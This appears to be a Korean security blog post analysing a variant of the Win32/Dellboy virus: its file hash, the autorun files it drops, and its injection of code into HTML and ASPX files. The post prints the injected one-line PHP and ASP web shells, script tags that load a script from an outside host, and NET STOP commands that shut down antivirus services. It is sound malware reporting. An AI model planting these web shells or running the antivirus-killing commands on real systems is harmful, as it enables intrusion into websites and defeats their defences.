728x90
반응형
Win32/Dellboy 바이러스 제작자는 검거 되었지만 변형은 계속 등장하고 있다.
MD5 : 5af7352bc0bd0e356aa1b408aee042c7
파일길이 : 53760
이번 변형은 바이러스 기능은 아직 찾지 못했다.
실행되면 각 드라이브에 autorun.inf 와 RECYCLER.EXE 생성한다.
플로피 디스크가 있는 시스템의 경우 플로피 디스크가 삽입되어 있지 않으면 에러가 발생 한다.
No disk
There is no disk in the drive, Please insert a disk into drive A:
플로피 디스크 드라이브에 플로피 디스크가 없을 때
이는 제작자가 모든 폴더에 RECYCLER.EXE와 AUTORUN.INF 파일을 생성하는데 미처 플로피 디스크인건 확인하지 않았기 때문이다.
시스템에서 확장자가 HTML, SHTML, ASPX 인 파일을 찾아 다음 스크립트를 삽입한다. 테스트 당시 해당 주소에는 접속되지 않았다.
<?php @eval($_POST[jokeyouphp])?>
<script language="javascript" src="http://htmlcss.3322.org/sub/ray.js"></script>
<%execute request("jokeyou")&""%>
<script language="javascript" src="http://htmlcss.3322.org/sub/ray.js"></script>
<script language="javascript" src="http://htmlcss.3322.org/sub/ray.js"></script>
시스템에는 ntion.exe 와 ntion.dll 파일을 생성한다.
여러 보안 프로그램을 강제 종료한다.
NET STOP MonSvcNT
NET STOP OfficeScanNT Monitor
NET STOP Norton
NET STOP ZoneAlarm
NET stop McShield
NET stop V3MonSvc ---> V3
NET stop MskService
NET stop McTaskManager
NET stop Symantec Core LC
NET stop kavsvc
NET stop spidernt
다음 프로그램 (주로 보안 프로그램 밑 시스템 툴)
VCRMON.EXE
KAV.EXE
CCAPP.EXE
NVSVC32.EXE
SPIDERUI.EXE
UPGRADE.EXE
SPIDERNT.EXE
MONSVCNT.EXE
MONSYSNT.EXE --> V3
TRIALREG.EXE
SUPDATE.EXE --> V3
AUTORUNS.EXE
ICESWORD.EXE
MCSHIELD.EXE
REGEDIT.EXE
MSCONFIG.EXE
물론 고스트(Ghost) 이미지 파일인 확장자가 GHO 인 파일도 삭제한다.
728x90
반응형
'보안위협 (악성코드) > 악성코드 소식' 카테고리의 다른 글
| 새로운 변조된 ANI 파일을 이용한 공격 (1) | 2007.03.31 |
|---|---|
| 로그온 후 다시 로그오프되는 문제 - exe.exe (다운로더) (0) | 2007.03.29 |
| MSN 메신저를 통해 photo album.zip 파일을 전송하는 ShadoBot (0) | 2007.03.26 |
| 안랩 ASP 폴더명을 바꿔 무력화 시도하는 악성코드 (0) | 2007.03.13 |
| EPSON 포토 스토리지에 악성코드 포함 (0) | 2007.03.07 |